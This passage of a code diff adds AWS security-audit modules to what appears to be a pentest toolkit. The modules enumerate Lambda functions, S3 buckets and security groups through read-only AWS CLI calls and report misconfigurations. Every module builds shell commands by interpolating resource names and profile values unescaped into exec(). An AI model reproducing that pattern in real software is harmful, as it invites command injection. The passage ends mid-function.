+  ): CloudScanTypes.CloudFinding {
+    const finding: CloudScanTypes.CloudFinding = {
+      id: `aws_iam_${Date.now()}_${Math.random().toString(36).slice(2, 8)}`,
+      provider: "aws",
+      severity,
+      title,
+      description,
+      resourceType,
+      resourceId,
+      category: "iam",
+      complianceFrameworks: ["cis"],
+      references: [],
+      foundAt: Date.now(),
+      source: "scanner",
+    }
+
+    Bus.publish(CloudScanEvents.FindingDetected, {
+      scanID,
+      provider: "aws",
+      findingId: finding.id,
+      title,
+      severity,
+      category: "iam",
+      resourceType,
+      resourceId,
+    })
+
+    return finding
+  }
+}
diff --git a/packages/opencode/src/pentest/cloudscan/aws/index.ts b/packages/opencode/src/pentest/cloudscan/aws/index.ts
new file mode 100644
index 00000000000..f5d30465fbf
--- /dev/null
+++ b/packages/opencode/src/pentest/cloudscan/aws/index.ts
@@ -0,0 +1,22 @@
+/**
+ * @fileoverview AWS Cloud Security Module
+ *
+ * AWS-specific security scanning capabilities.
+ *
+ * @module pentest/cloudscan/aws
+ */
+
+export { AWSIAM } from "./iam"
+export type { AWSIAMOptions, AWSIAMResult } from "./iam"
+
+export { AWSS3 } from "./s3"
+export type { AWSS3Options, AWSS3Result } from "./s3"
+
+export { AWSSecurityGroups } from "./security-groups"
+export type { AWSSecurityGroupOptions, AWSSecurityGroupResult } from "./security-groups"
+
+export { AWSEC2 } from "./ec2"
+export type { AWSEC2Options, AWSEC2Result } from "./ec2"
+
+export { AWSLambda } from "./lambda"
+export type { AWSLambdaOptions, AWSLambdaResult } from "./lambda"
diff --git a/packages/opencode/src/pentest/cloudscan/aws/lambda.ts b/packages/opencode/src/pentest/cloudscan/aws/lambda.ts
new file mode 100644
index 00000000000..5811c76a313
--- /dev/null
+++ b/packages/opencode/src/pentest/cloudscan/aws/lambda.ts
@@ -0,0 +1,389 @@
+/**
+ * @fileoverview AWS Lambda Analysis
+ *
+ * Lambda function enumeration and security analysis for AWS.
+ *
+ * @module pentest/cloudscan/aws/lambda
+ */
+
+import { exec } from "child_process"
+import { promisify } from "util"
+import { CloudScanTypes } from "../types"
+import { CloudScanEvents } from "../events"
+import { AWSCLIParser } from "../parsers/aws-cli"
+import { Bus } from "../../../bus"
+import { Log } from "../../../util/log"
+
+const execAsync = promisify(exec)
+
+const log = Log.create({ service: "cloudscan.aws.lambda" })
+
+/**
+ * AWS Lambda options.
+ */
+export interface AWSLambdaOptions {
+  profile?: string
+  region?: string
+  timeout?: number
+}
+
+/**
+ * AWS Lambda result.
+ */
+export interface AWSLambdaResult {
+  functions: CloudScanTypes.ServerlessFunction[]
+  findings: string[]
+  issues: CloudScanTypes.CloudFinding[]
+}
+
+/**
+ * AWS Lambda namespace.
+ */
+export namespace AWSLambda {
+  /**
+   * Enumerate all Lambda functions.
+   */
+  export async function enumerate(
+    scanID: string,
+    options: AWSLambdaOptions = {}
+  ): Promise<AWSLambdaResult> {
+    const result: AWSLambdaResult = {
+      functions: [],
+      findings: [],
+      issues: [],
+    }
+
+    const profileFlag = options.profile ? `--profile ${options.profile}` : ""
+    const regionFlag = options.region ? `--region ${options.region}` : ""
+
+    try {
+      log.info("Enumerating Lambda functions", { region: options.region })
+      const output = await runAWSCommand(
+        `aws lambda list-functions ${profileFlag} ${regionFlag} --output json`,
+        options.timeout
+      )
+
+      if (!output) {
+        result.findings.push("Failed to list Lambda functions")
+        return result
+      }
+
+      result.functions = AWSCLIParser.parseLambdaFunctions(output)
+
+      // Set region and enrich details
+      for (const fn of result.functions) {
+        fn.region = options.region
+        await enrichFunctionDetails(fn, profileFlag, regionFlag, options.timeout)
+
+        Bus.publish(CloudScanEvents.FunctionFound, {
+          scanID,
+          provider: "aws",
+          functionName: fn.name,
+          functionArn: fn.arn,
+          runtime: fn.runtime,
+          isPublic: fn.publiclyAccessible,
+          hasVpcConfig: !!fn.vpcConfig,
+        })
+      }
+
+      result.findings.push(`Found ${result.functions.length} Lambda functions`)
+
+      // Analyze for security issues
+      result.issues = analyzeLambdaSecurity(scanID, result.functions)
+
+    } catch (err) {
+      log.error("Lambda enumeration failed", { error: String(err) })
+      result.findings.push(`Lambda enumeration error: ${String(err)}`)
+    }
+
+    return result
+  }
+
+  /**
+   * Get functions with public access.
+   */
+  export async function getPublicFunctions(
+    options: AWSLambdaOptions = {}
+  ): Promise<CloudScanTypes.ServerlessFunction[]> {
+    const { functions } = await enumerate("check", options)
+    return functions.filter((f) => f.publiclyAccessible)
+  }
+
+  /**
+   * Get functions with secrets in environment variables.
+   */
+  export async function getFunctionsWithSecrets(
+    options: AWSLambdaOptions = {}
+  ): Promise<CloudScanTypes.ServerlessFunction[]> {
+    const { functions } = await enumerate("check", options)
+    return functions.filter((f) => f.envVarsWithSecrets.length > 0)
+  }
+
+  /**
+   * Get functions without VPC configuration.
+   */
+  export async function getFunctionsWithoutVPC(
+    options: AWSLambdaOptions = {}
+  ): Promise<CloudScanTypes.ServerlessFunction[]> {
+    const { functions } = await enumerate("check", options)
+    return functions.filter((f) => !f.vpcConfig)
+  }
+
+  /**
+   * Get functions with outdated runtimes.
+   */
+  export async function getFunctionsWithOutdatedRuntime(
+    options: AWSLambdaOptions = {}
+  ): Promise<CloudScanTypes.ServerlessFunction[]> {
+    const { functions } = await enumerate("check", options)
+
+    const outdatedRuntimes = [
+      "python2.7",
+      "python3.6",
+      "python3.7",
+      "nodejs10.x",
+      "nodejs12.x",
+      "nodejs14.x",
+      "ruby2.5",
+      "ruby2.7",
+      "java8",
+      "go1.x",
+      "dotnetcore2.1",
+      "dotnetcore3.1",
+    ]
+
+    return functions.filter((f) =>
+      f.runtime && outdatedRuntimes.includes(f.runtime)
+    )
+  }
+
+  /**
+   * Check function's resource policy for public access.
+   */
+  export async function checkResourcePolicy(
+    functionName: string,
+    options: AWSLambdaOptions = {}
+  ): Promise<{
+    hasPolicy: boolean
+    isPublic: boolean
+    statements: any[]
+  }> {
+    const profileFlag = options.profile ? `--profile ${options.profile}` : ""
+    const regionFlag = options.region ? `--region ${options.region}` : ""
+
+    try {
+      const output = await runAWSCommand(
+        `aws lambda get-policy --function-name ${functionName} ${profileFlag} ${regionFlag} --output json`,
+        options.timeout
+      )
+
+      if (!output) {
+        return { hasPolicy: false, isPublic: false, statements: [] }
+      }
+
+      const data = JSON.parse(output)
+      const policy = data.Policy ? JSON.parse(data.Policy) : null
+
+      if (!policy) {
+        return { hasPolicy: false, isPublic: false, statements: [] }
+      }
+
+      const statements = policy.Statement || []
+      const isPublic = statements.some(
+        (stmt: any) => stmt.Principal === "*" || stmt.Principal?.AWS === "*"
+      )
+
+      return { hasPolicy: true, isPublic, statements }
+    } catch (err) {
+      // No policy means not public
+      return { hasPolicy: false, isPublic: false, statements: [] }
+    }
+  }
+
+  /**
+   * Get function URL configuration.
+   */
+  export async function getFunctionUrl(
+    functionName: string,
+    options: AWSLambdaOptions = {}
+  ): Promise<{
+    hasUrl: boolean
+    url?: string
+    authType?: string
+  }> {
+    const profileFlag = options.profile ? `--profile ${options.profile}` : ""
+    const regionFlag = options.region ? `--region ${options.region}` : ""
+
+    try {
+      const output = await runAWSCommand(
+        `aws lambda get-function-url-config --function-name ${functionName} ${profileFlag} ${regionFlag} --output json`,
+        options.timeout
+      )
+
+      if (!output) {
+        return { hasUrl: false }
+      }
+
+      const data = JSON.parse(output)
+      return {
+        hasUrl: true,
+        url: data.FunctionUrl,
+        authType: data.AuthType,
+      }
+    } catch {
+      return { hasUrl: false }
+    }
+  }
+
+  // ========== Helper Functions ==========
+
+  async function runAWSCommand(command: string, _timeout?: number): Promise<string | null> {
+    try {
+      const { stdout } = await execAsync(command)
+      return stdout.trim()
+    } catch (err) {
+      log.debug("AWS command failed", { command, error: String(err) })
+      return null
+    }
+  }
+
+  async function enrichFunctionDetails(
+    fn: CloudScanTypes.ServerlessFunction,
+    profileFlag: string,
+    regionFlag: string,
+    timeout?: number
+  ): Promise<void> {
+    try {
+      // Check resource policy
+      const policyResult = await checkResourcePolicy(fn.name, {
+        profile: profileFlag.replace("--profile ", ""),
+        region: regionFlag.replace("--region ", ""),
+        timeout,
+      })
+
+      fn.hasResourcePolicy = policyResult.hasPolicy
+      fn.publiclyAccessible = policyResult.isPublic
+
+      // Check function URL
+      const urlResult = await getFunctionUrl(fn.name, {
+        profile: profileFlag.replace("--profile ", ""),
+        region: regionFlag.replace("--region ", ""),
+        timeout,
+      })
+
+      if (urlResult.hasUrl && urlResult.authType === "NONE") {
+        fn.publiclyAccessible = true
+      }
+    } catch (err) {
+      log.debug("Failed to enrich function details", { function: fn.name, error: String(err) })
+    }
+  }
+
+  function analyzeLambdaSecurity(
+    scanID: string,
+    functions: CloudScanTypes.ServerlessFunction[]
+  ): CloudScanTypes.CloudFinding[] {
+    const findings: CloudScanTypes.CloudFinding[] = []
+
+    for (const fn of functions) {
+      // Public function
+      if (fn.publiclyAccessible) {
+        findings.push(createFinding(
+          scanID,
+          "high",
+          "Lambda Function Publicly Accessible",
+          `Function ${fn.name} is publicly accessible without authentication.`,
+          fn
+        ))
+      }
+
+      // Secrets in environment variables
+      if (fn.envVarsWithSecrets.length > 0) {
+        findings.push(createFinding(
+          scanID,
+          "high",
+          "Lambda Function Has Secrets in Environment Variables",
+          `Function ${fn.name} has potential secrets in environment variables: ${fn.envVarsWithSecrets.join(", ")}. Use Secrets Manager or Parameter Store instead.`,
+          fn
+        ))
+      }
+
+      // Outdated runtime
+      const outdatedRuntimes = [
+        "python2.7",
+        "python3.6",
+        "python3.7",
+        "nodejs10.x",
+        "nodejs12.x",
+        "nodejs14.x",
+        "ruby2.5",
+        "ruby2.7",
+        "java8",
+        "go1.x",
+        "dotnetcore2.1",
+        "dotnetcore3.1",
+      ]
+
+      if (fn.runtime && outdatedRuntimes.includes(fn.runtime)) {
+        findings.push(createFinding(
+          scanID,
+          "medium",
+          "Lambda Function Uses Outdated Runtime",
+          `Function ${fn.name} uses outdated runtime ${fn.runtime}. Consider upgrading to a supported version.`,
+          fn
+        ))
+      }
+
+      // Function not in VPC (informational)
+      if (!fn.vpcConfig) {
+        findings.push(createFinding(
+          scanID,
+          "info",
+          "Lambda Function Not in VPC",
+          `Function ${fn.name} is not configured to run in a VPC.`,
+          fn
+        ))
+      }
+    }
+
+    return findings
+  }
+
+  function createFinding(
+    scanID: string,
+    severity: CloudScanTypes.Severity,
+    title: string,
+    description: string,
+    fn: CloudScanTypes.ServerlessFunction
+  ): CloudScanTypes.CloudFinding {
+    const finding: CloudScanTypes.CloudFinding = {
+      id: `aws_lambda_${Date.now()}_${Math.random().toString(36).slice(2, 8)}`,
+      provider: "aws",
+      region: fn.region,
+      severity,
+      title,
+      description,
+      resourceType: "function",
+      resourceId: fn.id,
+      resourceArn: fn.arn,
+      category: "compute",
+      complianceFrameworks: ["cis"],
+      references: [],
+      foundAt: Date.now(),
+      source: "scanner",
+    }
+
+    Bus.publish(CloudScanEvents.FindingDetected, {
+      scanID,
+      provider: "aws",
+      findingId: finding.id,
+      title,
+      severity,
+      category: "compute",
+      resourceType: "function",
+      resourceId: fn.id,
+    })
+
+    return finding
+  }
+}
diff --git a/packages/opencode/src/pentest/cloudscan/aws/s3.ts b/packages/opencode/src/pentest/cloudscan/aws/s3.ts
new file mode 100644
index 00000000000..c739e4846aa
--- /dev/null
+++ b/packages/opencode/src/pentest/cloudscan/aws/s3.ts
@@ -0,0 +1,434 @@
+/**
+ * @fileoverview AWS S3 Security Analysis
+ *
+ * S3 bucket enumeration and security analysis for AWS.
+ *
+ * @module pentest/cloudscan/aws/s3
+ */
+
+import { exec } from "child_process"
+import { promisify } from "util"
+import { CloudScanTypes } from "../types"
+import { CloudScanEvents } from "../events"
+import { AWSCLIParser } from "../parsers/aws-cli"
+import { Bus } from "../../../bus"
+import { Log } from "../../../util/log"
+
+const execAsync = promisify(exec)
+
+const log = Log.create({ service: "cloudscan.aws.s3" })
+
+/**
+ * AWS S3 options.
+ */
+export interface AWSS3Options {
+  profile?: string
+  region?: string
+  timeout?: number
+  checkPolicies?: boolean
+}
+
+/**
+ * AWS S3 result.
+ */
+export interface AWSS3Result {
+  buckets: CloudScanTypes.StorageBucket[]
+  findings: string[]
+  issues: CloudScanTypes.CloudFinding[]
+}
+
+/**
+ * AWS S3 namespace.
+ */
+export namespace AWSS3 {
+  /**
+   * Enumerate all S3 buckets and their security settings.
+   */
+  export async function enumerate(
+    scanID: string,
+    options: AWSS3Options = {}
+  ): Promise<AWSS3Result> {
+    const result: AWSS3Result = {
+      buckets: [],
+      findings: [],
+      issues: [],
+    }
+
+    const profileFlag = options.profile ? `--profile ${options.profile}` : ""
+
+    try {
+      // List all buckets
+      log.info("Enumerating S3 buckets")
+      const bucketsOutput = await runAWSCommand(`aws s3api list-buckets ${profileFlag} --output json`, options.timeout)
+
+      if (!bucketsOutput) {
+        result.findings.push("Failed to list S3 buckets")
+        return result
+      }
+
+      const partialBuckets = AWSCLIParser.parseBuckets(bucketsOutput)
+      result.findings.push(`Found ${partialBuckets.length} S3 buckets`)
+
+      // Get details for each bucket
+      for (const partial of partialBuckets) {
+        const bucket = await enrichBucketDetails(partial.name!, profileFlag, options)
+
+        result.buckets.push(bucket)
+
+        Bus.publish(CloudScanEvents.BucketFound, {
+          scanID,
+          provider: "aws",
+          bucketName: bucket.name,
+          region: bucket.region,
+          isPublic: !bucket.publicAccessBlocked,
+          hasEncryption: bucket.encryption?.enabled || false,
+          hasVersioning: bucket.versioningEnabled,
+        })
+
+        // Check for public access
+        if (!bucket.publicAccessBlocked || bucket.hasPolicyPublicAccess) {
+          Bus.publish(CloudScanEvents.PublicBucketFound, {
+            scanID,
+            provider: "aws",
+            bucketName: bucket.name,
+            bucketArn: bucket.arn,
+            accessLevel: bucket.accessLevel,
+            reason: bucket.hasPolicyPublicAccess
+              ? "Bucket policy allows public access"
+              : "Public access block not enabled",
+          })
+        }
+      }
+
+      // Analyze for security issues
+      result.issues = analyzeS3Security(scanID, result.buckets)
+
+    } catch (err) {
+      log.error("S3 enumeration failed", { error: String(err) })
+      result.findings.push(`S3 enumeration error: ${String(err)}`)
+    }
+
+    return result
+  }
+
+  /**
+   * Check if a bucket is publicly accessible.
+   */
+  export async function checkPublicAccess(
+    bucketName: string,
+    options: AWSS3Options = {}
+  ): Promise<{
+    isPublic: boolean
+    reasons: string[]
+  }> {
+    const profileFlag = options.profile ? `--profile ${options.profile}` : ""
+    const reasons: string[] = []
+
+    try {
+      // Check public access block
+      const pabOutput = await runAWSCommand(
+        `aws s3api get-public-access-block --bucket ${bucketName} ${profileFlag} --output json`,
+        options.timeout
+      )
+
+      const pab = pabOutput ? AWSCLIParser.parseBucketPublicAccessBlock(pabOutput) : null
+
+      if (!pab) {
+        reasons.push("Public access block not configured")
+      } else {
+        if (!pab.blockPublicAcls) reasons.push("BlockPublicAcls is disabled")
+        if (!pab.ignorePublicAcls) reasons.push("IgnorePublicAcls is disabled")
+        if (!pab.blockPublicPolicy) reasons.push("BlockPublicPolicy is disabled")
+        if (!pab.restrictPublicBuckets) reasons.push("RestrictPublicBuckets is disabled")
+      }
+
+      // Check bucket policy
+      const policyOutput = await runAWSCommand(
+        `aws s3api get-bucket-policy --bucket ${bucketName} ${profileFlag} --output json`,
+        options.timeout
+      )
+
+      if (policyOutput) {
+        const statements = AWSCLIParser.parseBucketPolicy(policyOutput)
+
+        for (const stmt of statements) {
+          if (stmt.effect === "Allow" && stmt.principals?.includes("*")) {
+            reasons.push("Bucket policy allows access to principal '*'")
+          }
+        }
+      }
+
+      // Check bucket ACL
+      const aclOutput = await runAWSCommand(
+        `aws s3api get-bucket-acl --bucket ${bucketName} ${profileFlag} --output json`,
+        options.timeout
+      )
+
+      if (aclOutput) {
+        const data = JSON.parse(aclOutput)
+        const grants = data.Grants || []
+
+        for (const grant of grants) {
+          const granteeUri = grant.Grantee?.URI || ""
+          if (
+            granteeUri.includes("AllUsers") ||
+            granteeUri.includes("AuthenticatedUsers")
+          ) {
+            reasons.push(`ACL grants ${grant.Permission} to ${granteeUri.split("/").pop()}`)
+          }
+        }
+      }
+
+      return {
+        isPublic: reasons.length > 0,
+        reasons,
+      }
+    } catch (err) {
+      log.debug("Failed to check public access", { bucket: bucketName, error: String(err) })
+      return { isPublic: false, reasons: [] }
+    }
+  }
+
+  /**
+   * Get buckets without encryption.
+   */
+  export async function getBucketsWithoutEncryption(
+    options: AWSS3Options = {}
+  ): Promise<CloudScanTypes.StorageBucket[]> {
+    const { buckets } = await enumerate("check", { ...options, checkPolicies: false })
+    return buckets.filter((b) => !b.encryption?.enabled)
+  }
+
+  /**
+   * Get buckets without versioning.
+   */
+  export async function getBucketsWithoutVersioning(
+    options: AWSS3Options = {}
+  ): Promise<CloudScanTypes.StorageBucket[]> {
+    const { buckets } = await enumerate("check", { ...options, checkPolicies: false })
+    return buckets.filter((b) => !b.versioningEnabled)
+  }
+
+  /**
+   * Get public buckets.
+   */
+  export async function getPublicBuckets(
+    options: AWSS3Options = {}
+  ): Promise<CloudScanTypes.StorageBucket[]> {
+    const { buckets } = await enumerate("check", options)
+    return buckets.filter((b) => !b.publicAccessBlocked || b.hasPolicyPublicAccess)
+  }
+
+  // ========== Helper Functions ==========
+
+  async function runAWSCommand(command: string, _timeout?: number): Promise<string | null> {
+    try {
+      const { stdout } = await execAsync(command)
+      return stdout.trim()
+    } catch (err) {
+      log.debug("AWS command failed", { command, error: String(err) })
+      return null
+    }
+  }
+
+  async function enrichBucketDetails(
+    bucketName: string,
+    profileFlag: string,
+    options: AWSS3Options
+  ): Promise<CloudScanTypes.StorageBucket> {
+    const bucket: CloudScanTypes.StorageBucket = {
+      id: bucketName,
+      arn: `arn:aws:s3:::${bucketName}`,
+      name: bucketName,
+      provider: "aws",
+      accessLevel: "private",
+      publicAccessBlocked: true,
+      aclEnabled: false,
+      acls: [],
+      issues: [],
+      versioningEnabled: false,
+      loggingEnabled: false,
+      mfaDeleteRequired: false,
+      hasPolicyPublicAccess: false,
+    }
+
+    try {
+      // Get bucket location (region)
+      const locationOutput = await runAWSCommand(
+        `aws s3api get-bucket-location --bucket ${bucketName} ${profileFlag} --output json`,
+        options.timeout
+      )
+      if (locationOutput) {
+        const data = JSON.parse(locationOutput)
+        bucket.region = data.LocationConstraint || "us-east-1"
+      }
+
+      // Get public access block
+      const pabOutput = await runAWSCommand(
+        `aws s3api get-public-access-block --bucket ${bucketName} ${profileFlag} --output json`,
+        options.timeout
+      )
+      if (pabOutput) {
+        const pab = AWSCLIParser.parseBucketPublicAccessBlock(pabOutput)
+        if (pab) {
+          bucket.publicAccessBlocked =
+            pab.blockPublicAcls &&
+            pab.ignorePublicAcls &&
+            pab.blockPublicPolicy &&
+            pab.restrictPublicBuckets
+        }
+      } else {
+        bucket.publicAccessBlocked = false
+        bucket.issues.push("Public access block not configured")
+      }
+
+      // Get encryption
+      const encryptionOutput = await runAWSCommand(
+        `aws s3api get-bucket-encryption --bucket ${bucketName} ${profileFlag} --output json`,
+        options.timeout
+      )
+      bucket.encryption = AWSCLIParser.parseBucketEncryption(encryptionOutput || "")
+
+      if (!bucket.encryption?.enabled) {
+        bucket.issues.push("Server-side encryption not enabled")
+      }
+
+      // Get versioning
+      const versioningOutput = await runAWSCommand(
+        `aws s3api get-bucket-versioning --bucket ${bucketName} ${profileFlag} --output json`,
+        options.timeout
+      )
+      bucket.versioningEnabled = AWSCLIParser.parseBucketVersioning(versioningOutput || "")
+
+      // Get logging
+      const loggingOutput = await runAWSCommand(
+        `aws s3api get-bucket-logging --bucket ${bucketName} ${profileFlag} --output json`,
+        options.timeout
+      )
+      bucket.loggingEnabled = AWSCLIParser.parseBucketLogging(loggingOutput || "")
+
+      // Check bucket policy if requested
+      if (options.checkPolicies !== false) {
+        const policyOutput = await runAWSCommand(
+          `aws s3api get-bucket-policy --bucket ${bucketName} ${profileFlag} --output json`,
+          options.timeout
+        )
+        if (policyOutput) {
+          const statements = AWSCLIParser.parseBucketPolicy(policyOutput)
+
+          // Check for public access in policy
+          bucket.hasPolicyPublicAccess = statements.some(
+            (stmt) => stmt.effect === "Allow" && stmt.principals?.includes("*")
+          )
+
+          if (bucket.hasPolicyPublicAccess) {
+            bucket.issues.push("Bucket policy allows public access")
+          }
+        }
+      }
+
+      // Determine access level
+      if (!bucket.publicAccessBlocked || bucket.hasPolicyPublicAccess) {
+        bucket.accessLevel = bucket.hasPolicyPublicAccess ? "public-read" : "authenticated"
+      }
+
+    } catch (err) {
+      log.debug("Failed to enrich bucket details", { bucket: bucketName, error: String(err) })
+    }
+
+    return bucket
+  }
+
+  function analyzeS3Security(
+    scanID: string,
+    buckets: CloudScanTypes.StorageBucket[]
+  ): CloudScanTypes.CloudFinding[] {
+    const findings: CloudScanTypes.CloudFinding[] = []
+
+    for (const bucket of buckets) {
+      // Public bucket
+      if (!bucket.publicAccessBlocked || bucket.hasPolicyPublicAccess) {
+        findings.push(createFinding(
+          scanID,
+          "high",
+          "S3 Bucket Publicly Accessible",
+          `Bucket ${bucket.name} is publicly accessible. ${bucket.issues.join(". ")}`,
+          bucket
+        ))
+      }
+
+      // No encryption
+      if (!bucket.encryption?.enabled) {
+        findings.push(createFinding(
+          scanID,
+          "medium",
+          "S3 Bucket Without Encryption",
+          `Bucket ${bucket.name} does not have server-side encryption enabled.`,
+          bucket
+        ))
+      }
+
+      // No versioning
+      if (!bucket.versioningEnabled) {
+        findings.push(createFinding(
+          scanID,
+          "low",
+          "S3 Bucket Without Versioning",
+          `Bucket ${bucket.name} does not have versioning enabled.`,
+          bucket
+        ))
+      }
+
+      // No logging
+      if (!bucket.loggingEnabled) {
+        findings.push(createFinding(
+          scanID,
+          "low",
+          "S3 Bucket Without Access Logging",
+          `Bucket ${bucket.name} does not have access logging enabled.`,
+          bucket
+        ))
+      }
+    }
+
+    return findings
+  }
+
+  function createFinding(
+    scanID: string,
+    severity: CloudScanTypes.Severity,
+    title: string,
+    description: string,
+    bucket: CloudScanTypes.StorageBucket
+  ): CloudScanTypes.CloudFinding {
+    const finding: CloudScanTypes.CloudFinding = {
+      id: `aws_s3_${Date.now()}_${Math.random().toString(36).slice(2, 8)}`,
+      provider: "aws",
+      region: bucket.region,
+      severity,
+      title,
+      description,
+      resourceType: "bucket",
+      resourceId: bucket.id,
+      resourceArn: bucket.arn,
+      category: "storage",
+      complianceFrameworks: ["cis", "pci-dss"],
+      references: [],
+      foundAt: Date.now(),
+      source: "scanner",
+    }
+
+    Bus.publish(CloudScanEvents.FindingDetected, {
+      scanID,
+      provider: "aws",
+      findingId: finding.id,
+      title,
+      severity,
+      category: "storage",
+      resourceType: "bucket",
+      resourceId: bucket.id,
+    })
+
+    return finding
+  }
+}
diff --git a/packages/opencode/src/pentest/cloudscan/aws/security-groups.ts b/packages/opencode/src/pentest/cloudscan/aws/security-groups.ts
new file mode 100644
index 00000000000..7a269edf259
--- /dev/null
+++ b/packages/opencode/src/pentest/cloudscan/aws/security-groups.ts
@@ -0,0 +1,410 @@
+/**
+ * @fileoverview AWS Security Groups Analysis
+ *
+ * EC2 security group enumeration and analysis for AWS.
+ *
+ * @module pentest/cloudscan/aws/security-groups
+ */
+
+import { exec } from "child_process"
+import { promisify } from "util"
+import { CloudScanTypes } from "../types"
+import { CloudScanEvents } from "../events"
+import { AWSCLIParser } from "../parsers/aws-cli"
+import { Bus } from "../../../bus"
+import { Log } from "../../../util/log"
+
+const execAsync = promisify(exec)
+
+const log = Log.create({ service: "cloudscan.aws.security-groups" })
+
+/**
+ * AWS Security Group options.
+ */
+export interface AWSSecurityGroupOptions {
+  profile?: string
+  region?: string
+  timeout?: number
+  vpcId?: string
+}
+
+/**
+ * AWS Security Group result.
+ */
+export interface AWSSecurityGroupResult {
+  securityGroups: CloudScanTypes.SecurityGroup[]
+  findings: string[]
+  issues: CloudScanTypes.CloudFinding[]
+}
+
+/**
+ * AWS Security Groups namespace.
+ */
+export namespace AWSSecurityGroups {
+  /**
+   * Enumerate all security groups and analyze their rules.
+   */
+  export async function enumerate(
+    scanID: string,
+    options: AWSSecurityGroupOptions = {}
+  ): Promise<AWSSecurityGroupResult> {
+    const result: AWSSecurityGroupResult = {
+      securityGroups: [],
+      findings: [],
+      issues: [],
+    }
+
+    const profileFlag = options.profile ? `--profile ${options.profile}` : ""
+    const regionFlag = options.region ? `--region ${options.region}` : ""
+    const vpcFilter = options.vpcId ? `--filters Name=vpc-id,Values=${options.vpcId}` : ""
+
+    try {
+      log.info("Enumerating security groups", { region: options.region })
+      const output = await runAWSCommand(
+        `aws ec2 describe-security-groups ${profileFlag} ${regionFlag} ${vpcFilter} --output json`,
+        options.timeout
+      )
+
+      if (!output) {
+        result.findings.push("Failed to list security groups")
+        return result
+      }
+
+      result.securityGroups = AWSCLIParser.parseSecurityGroups(output)
+      result.findings.push(`Found ${result.securityGroups.length} security groups`)
+
+      // Analyze each security group
+      for (const sg of result.securityGroups) {
+        // Analyze rules for issues
+        analyzeSecurityGroupRules(sg)
+
+        Bus.publish(CloudScanEvents.SecurityGroupFound, {
+          scanID,
+          provider: "aws",
+          groupId: sg.id,
+          groupName: sg.name,
+          vpcId: sg.vpcId,
+          ruleCount: sg.rules.length,
+          hasPublicIngress: sg.hasPublicIngress,
+        })
+
+        // Emit events for insecure rules
+        for (const rule of sg.rules) {
+          if (rule.issues.length > 0) {
+            const portStr = rule.portRange
+              ? rule.portRange.from === rule.portRange.to
+                ? rule.portRange.from.toString()
+                : `${rule.portRange.from}-${rule.portRange.to}`
+              : "all"
+
+            for (const issue of rule.issues) {
+              Bus.publish(CloudScanEvents.InsecureRuleFound, {
+                scanID,
+                provider: "aws",
+                groupId: sg.id,
+                groupName: sg.name,
+                direction: rule.direction,
+                protocol: rule.protocol,
+                port: portStr,
+                source: rule.source,
+                issue,
+              })
+            }
+          }
+        }
+      }
+
+      // Generate security findings
+      result.issues = analyzeSecurityGroupsSecurity(scanID, result.securityGroups)
+
+    } catch (err) {
+      log.error("Security group enumeration failed", { error: String(err) })
+      result.findings.push(`Security group enumeration error: ${String(err)}`)
+    }
+
+    return result
+  }
+
+  /**
+   * Get security groups with public ingress.
+   */
+  export async function getPublicIngress(
+    options: AWSSecurityGroupOptions = {}
+  ): Promise<CloudScanTypes.SecurityGroup[]> {
+    const { securityGroups } = await enumerate("check", options)
+    return securityGroups.filter((sg) => sg.hasPublicIngress)
+  }
+
+  /**
+   * Get security groups allowing unrestricted access.
+   */
+  export async function getUnrestrictedAccess(
+    options: AWSSecurityGroupOptions = {}
+  ): Promise<CloudScanTypes.SecurityGroup[]> {
+    const { securityGroups } = await enumerate("check", options)
+    return securityGroups.filter((sg) => sg.hasUnrestrictedIngress)
+  }
+
+  /**
+   * Get security groups with specific port open to public.
+   */
+  export async function getPublicPort(
+    port: number,
+    options: AWSSecurityGroupOptions = {}
+  ): Promise<CloudScanTypes.SecurityGroup[]> {
+    const { securityGroups } = await enumerate("check", options)
+
+    return securityGroups.filter((sg) =>
+      sg.rules.some(
+        (rule) =>
+          rule.direction === "inbound" &&
+          rule.isPublic &&
+          rule.portRange &&
+          port >= rule.portRange.from &&
+          port <= rule.portRange.to
+      )
+    )
+  }
+
+  /**
+   * Get unused security groups.
+   */
+  export async function getUnused(
+    options: AWSSecurityGroupOptions = {}
+  ): Promise<CloudScanTypes.SecurityGroup[]> {
+    const profileFlag = options.profile ? `--profile ${options.profile}` : ""
+    const regionFlag = options.region ? `--region ${options.region}` : ""
+
+    try {
+      // Get all security groups
+      const sgOutput = await runAWSCommand(
+        `aws ec2 describe-security-groups ${profileFlag} ${regionFlag} --output json`,
+        options.timeout
+      )
+
+      if (!sgOutput) return []
+
+      const securityGroups = AWSCLIParser.parseSecurityGroups(sgOutput)
+
+      // Get network interfaces to find used security groups
+      const niOutput = await runAWSCommand(
+        `aws ec2 describe-network-interfaces ${profileFlag} ${regionFlag} --output json`,
+        options.timeout
+      )
+
+      const usedSgIds = new Set<string>()
+
+      if (niOutput) {
+        const data = JSON.parse(niOutput)
+        for (const ni of data.NetworkInterfaces || []) {
+          for (const sg of ni.Groups || []) {
+            usedSgIds.add(sg.GroupId)
+          }
+        }
+      }
+
+      return securityGroups.filter(
+        (sg) => !usedSgIds.has(sg.id) && sg.name !== "default"
+      )
+    } catch (err) {
+      log.error("Failed to get unused security groups", { error: String(err) })
+      return []
+    }
+  }
+
+  /**
+   * Check a specific security group for issues.
+   */
+  export async function check(
+    groupId: string,
+    options: AWSSecurityGroupOptions = {}
+  ): Promise<{
+    securityGroup: CloudScanTypes.SecurityGroup | null
+    issues: string[]
+  }> {
+    const profileFlag = options.profile ? `--profile ${options.profile}` : ""
+    const regionFlag = options.region ? `--region ${options.region}` : ""
+
+    try {
+      const output = await runAWSCommand(
+        `aws ec2 describe-security-groups --group-ids ${groupId} ${profileFlag} ${regionFlag} --output json`,
+        options.timeout
+      )
+
+      if (!output) {
+        return { securityGroup: null, issues: ["Failed to get security group"] }
+      }
+
+      const securityGroups = AWSCLIParser.parseSecurityGroups(output)
+      if (securityGroups.length === 0) {
+        return { securityGroup: null, issues: ["Security group not found"] }
+      }
+
+      const sg = securityGroups[0]
+      analyzeSecurityGroupRules(sg)
+
+      const issues: string[] = []
+
+      for (const rule of sg.rules) {
+        issues.push(...rule.issues)
+      }
+
+      if (sg.hasUnrestrictedIngress) {
+        issues.push("Security group allows unrestricted inbound access (0.0.0.0/0 on all ports)")
+      }
+
+      return { securityGroup: sg, issues }
+    } catch (err) {
+      log.error("Failed to check security group", { groupId, error: String(err) })
+      return { securityGroup: null, issues: [String(err)] }
+    }
+  }
+
+  // ========== Helper Functions ==========
+
+  async function runAWSCommand(command: string, _timeout?: number): Promise<string | null> {
+    try {
+      const { stdout } = await execAsync(command)
+      return stdout.trim()
